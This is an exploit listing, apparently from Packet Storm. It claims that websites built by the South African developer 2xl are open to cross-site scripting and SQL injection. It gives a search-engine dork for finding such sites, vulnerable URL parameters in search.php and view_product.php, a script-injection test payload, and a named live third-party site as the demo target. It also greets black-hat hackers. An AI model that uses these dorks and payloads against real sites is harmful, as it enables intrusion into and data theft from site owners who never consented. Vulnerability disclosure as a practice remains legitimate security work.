Sites created by 2xl suffer from cross site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
ef461ed4e82b2f54e143459a318607a885d569d2f9757165e4c688d024c3de2f################################################################
----------------------------------------------------------------
2xl XSS/SQL Injection Vulnerability
----------------------------------------------------------------
################################################################
# Exploit Title : 2xl XSS/SQL Injection Vulnerability
# Author : Hack Center Security Team
# Discovered By : Net.W0lf
# Software Link : [ www.2xl.co.za ]
# Impact : [ High ]
# E-Mail : Bl4ck.Intell@gmail.com
# Dork : intext:" Site by 2xl "
################################################################
----------------------------------------------------------------
+-----------------------+
| Cross Site scripting |
| SQL Injection |
+-----------------------+
Expl0!T :
XSS :
[TarGeT]/search.php?p=7
SQL :
[TaRgeT]/view_product.php?p=&id=[SQL]
Dem0:
XSS :
Search This Text : <script>alert(/0/)</script>
To This Page : www.lpcreative.co.za/search.php?p=7
SQL :
wwww.lpcreative.co.za/view_product.php?p=&id='
Greets To :
| Am!r | B3HZ4D | PacketStormSecurity.org | Exploit-db.com |
| And All Iranian Black Hat HackerZ |
===========================================# End #=============================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed